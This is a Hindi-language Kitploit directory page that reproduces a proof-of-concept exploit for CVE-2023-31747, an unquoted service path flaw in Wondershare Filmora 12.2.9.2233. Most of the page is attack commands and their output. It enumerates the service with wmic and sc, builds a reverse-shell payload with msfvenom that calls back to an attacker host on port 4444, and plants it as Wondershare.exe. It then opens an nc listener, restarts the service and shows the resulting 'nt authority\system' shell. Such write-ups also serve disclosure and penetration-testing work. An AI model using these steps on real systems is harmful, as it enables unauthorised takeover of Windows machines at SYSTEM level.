Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-31747 — CVE-2023-31747 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट: Wondershare Filmora 12.2.9.2233 में अनकोटेड सर्विस पाथ, जो क्राफ्टेड एक्ज़ीक्यूटेबल प्लेसमेंट के माध्यम से SYSTEM तक स्थानीय विशेषाधिकार वृद्धि (local privilege escalation) सक्षम बनाता है। | Kitploit
उपकरण/GitHubGitHub/msd0pe-1/cve-2023-31747
विशेषाधिकार वृद्धिपेलोड जनरेशनभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंग
GitHubmsd0pe-1/cve-2023-31747

CVE-2023-31747

CVE-2023-31747 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट: Wondershare Filmora 12.2.9.2233 में अनकोटेड सर्विस पाथ, जो क्राफ्टेड एक्ज़ीक्यूटेबल प्लेसमेंट के माध्यम से SYSTEM तक स्थानीय विशेषाधिकार वृद्धि (local privilege escalation) सक्षम बनाता है।

रिपॉजिटरी देखें
13 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
############################################################################
#                                                                          #
#  Exploit Title: Wondershare Filmora 12.2.9.2233 - Unquoted Service Path  #
#  CVE-2023-31747                                                          #
#  Date: 2023/04/23                                                        #
#  Exploit Author: msd0pe                                                  #
#  Vendor Homepage: https://www.wondershare.com                            #
#  My Github: https://github.com/msd0pe-1                                  # 
#                                                                          # 
############################################################################

Wondershare Filmora:

संस्करण =< 12.2.9.2233 में एक अनक्वोटेड सेवा पथ मौजूद है जो हमलावरों को सिस्टम स्तर तक विशेषाधिकार बढ़ाने की अनुमति देता है।

अनक्वोटेड सेवा पथ खोजें:

    > wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """

    Wondershare Native Push Service   NativePushService   C:\Users\msd0pe\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe   Auto

सेवा के बारे में जानकारी प्राप्त करें:

    > sc qc "NativePushService"

    [SC] QueryServiceConfig SUCCESS

    SERVICE_NAME: NativePushService
            TYPE               : 10  WIN32_OWN_PROCESS
            START_TYPE         : 2   AUTO_START
            ERROR_CONTROL      : 1   NORMAL
            BINARY_PATH_NAME   : C:\Users\msd0pe\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe
            LOAD_ORDER_GROUP   :
            TAG                : 0
            DISPLAY_NAME       : Wondershare Native Push Service
            DEPENDENCIES       :
            SERVICE_START_NAME : LocalSystem

रिवर्स शेल बनाएं:

    > msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o Wondershare.exe

रिवर्स शेल को C:\Users\msd0pe\AppData\Local\Wondershare\Wondershare.exe पर अपलोड करें

    > put Wondershare.exe
    > ls
    drw-rw-rw-          0  Sun Apr 23 14:51:47 2023 .
    drw-rw-rw-          0  Sun Apr 23 14:51:47 2023 ..
    drw-rw-rw-          0  Sun Apr 23 14:36:26 2023 Wondershare Filmora Update
    drw-rw-rw-          0  Sun Apr 23 14:37:13 2023 Wondershare NativePush
    -rw-rw-rw-       7168  Sun Apr 23 14:51:47 2023 Wondershare.exe
    drw-rw-rw-          0  Sun Apr 23 13:52:30 2023 WSHelper

लिसनर प्रारंभ करें

    > nc -lvp 4444

सेवा/सर्वर को पुनरारंभ करें

    > sc stop "NativePushService"
    > sc start "NativePushService"

या

    > shutdown /r

आनंद लें !

    192.168.1.102: inverse host lookup failed: Unknown host
    connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309
    Microsoft Windows [Version 10.0.19045.2130]
    (c) Microsoft Corporation. All rights reserved.

    C:\Windows\system32>whoami

    nt authority\system
टूल डाउनलोड करें